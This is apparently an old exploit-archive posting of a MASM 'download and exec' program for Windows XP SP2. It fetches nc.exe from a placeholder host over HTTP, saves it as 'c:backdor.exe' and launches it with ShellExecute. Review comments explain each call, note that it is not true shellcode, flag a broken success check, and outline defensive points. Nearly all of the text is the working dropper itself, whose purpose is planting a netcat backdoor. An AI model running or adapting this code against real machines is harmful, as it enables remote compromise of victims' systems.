# Title : WinXP SP2 Fr Download and Exec Shellcode
# Published : 2010-05-10
# Author : Crack_MaN
Exploit Title : WinXP SP2 FR download & exec
Date : 06/5/2010
Author : Crack_MaN
code:
;-------------------------------------------
.586
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include shell32.inc
include urlmon.inc
includelib user32.lib
includelib kernel32.lib
includelib shell32.lib
includelib urlmon.lib
; Data for the downloader below: the remote object to fetch and the local
; file it is written to. Both strings are NUL-terminated ANSI.
.data
; Source URL passed to URLDownloadToFile. www.site.com is the author's
; placeholder host. The scheme is plain HTTP, so the request and the
; executable payload are visible to a proxy or network sensor.
URL db "http://www.site.com/nc.exe",0
; Destination file name. There is no backslash after the drive letter, so
; Windows resolves it relative to the current directory on drive C:, not to
; the root of the drive. Keep this in mind when searching for the dropped file.
PATH db "c:backdor.exe",0
.data?
; Receives the value returned by URLDownloadToFile (an HRESULT). It is stored
; but never read again in this listing.
hResult dd ?
.code
; ---------------------------------------------------------------------------
; Program entry point: fetches URL into PATH with urlmon's URLDownloadToFile,
; then opens the resulting file with ShellExecute.
;
; NOTE(review): the page labels this "shellcode", but the listing is an
; ordinary MASM program. It relies on import libraries and a .data section.
;
; Defensive view: one process fetches an .exe over HTTP, writes a new
; executable to disk, and then launches that file. Each of those three steps
; is a separate point where it can be logged or blocked.
; ---------------------------------------------------------------------------
start:
; Arguments: pCaller = 0, source URL, destination file, reserved = 0,
; status callback = 0 (no progress notifications).
invoke URLDownloadToFile,0,addr URL,addr PATH,0,0
; Keep the returned HRESULT.
mov hResult,eax
; URLDownloadToFile reports success as S_OK (0). This condition is true for
; every value except 1, so it does not separate success from failure. The
; launch below is attempted whatever the download outcome was.
.if eax!=1
; hwnd = 0, default verb, file = PATH, no parameters, no working directory,
; window shown normally (SW_SHOW).
invoke ShellExecute,0,0,addr PATH,0,0,SW_SHOW
.endif
; No process-exit call follows .endif in this listing.
end start